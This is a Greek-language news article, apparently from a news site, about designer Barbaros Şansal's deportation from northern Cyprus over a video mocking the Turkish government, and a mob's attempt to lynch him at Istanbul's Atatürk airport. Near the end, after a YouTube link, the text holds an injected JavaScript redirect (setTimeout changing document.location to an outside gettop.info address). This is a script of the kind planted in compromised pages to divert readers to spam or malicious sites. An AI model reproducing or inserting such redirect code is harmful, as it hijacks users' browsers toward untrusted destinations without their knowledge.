Κωνσταντινούπολη: Λίντσαραν σχεδιαστή μόδας στο Ατατούρκ (ΒΙΝΤΕΟ)

0
28

 

Έπειτα από απόφαση της φερόμενης κυβέρνησης του ψευδοκράτους, ο σχεδιαστής μόδας Μπαρμαπρός Σανσάλ απελάθηκε στην Τουρκία. Ο λόγος της απέλασης ήταν βίντεο που ανήρτησε στο YouTubeδιαδίκτυο την παραμονή της Πρωτοχρονιάς και με το οποίο ασκούσε κριτική στην τουρκική κυβέρνηση και στους υποστηρικτές της.

Έκανε λόγο για όργιο διαφθοράς στην Τουρκία, φαινόμενα θρησκευτικού σκοταδισμού, ηθική κατάπτωση και σε σκωπτικό ύφος έλεγε στον τουρκικό λαό ότι διασκεδάζουν για την Πρωτοχρονιά παρά την κατάπτωσή της, αλλά εκείνος δεν διασκεδάζει και θα καταναλώσει όλο το αλκοόλ που θα βρει στο σπίτι του και τα μπαρ. Τέλος, από τα ειρωνικά του σχόλια δεν ξέφυγε και το γεγονός ότι στα κατεχόμενα έχουν διαφορετική ώρα, λέγοντας που θα πάει να γιορτάσει για δεύτερη φορά την Πρωτοχρονιά στη Λευκωσία.

«Αυτή την ώρα είμαι στην βόρεια Κύπρο και ο νέος χρόνος έχει μπει λόγω της καταπίεσης που υπήρξε. Στην Κυπριακή Δημοκρατία θα μπει ο νέος χρόνος σε μια ώρα. Σε λίγο θα πάω στη Λευκωσία και θα γιορτάσω κι εκεί… Εσείς συνεχίστε να γιορτάζετε μέσα σε τόση βρωμιά, ντροπή και αθλιότητα» είπε μεταξύ άλλων ο Σανσάλ στο βίντεό του που θεωρήθηκε επίθεση στον Ερντογάν.

Κατά την άφιξή του στο αεροδρόμιο «Ατατούρκ» της Κωνσταντινούπολης, όχλος φανατικών ισλαμιστών και εθνικιστών πέρασε τα μέτρα ασφαλείας, εισήλθε εντός του χώρου στάθμευσης του αεροσκάφους και επιχείρησε να λιντσάρει τον Σανσάλ. Στο μεταξύ, αστυνομικοί περίμεναν για να τον συλλάβουν.

https://youtu.be/mWPgilUXiFs setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here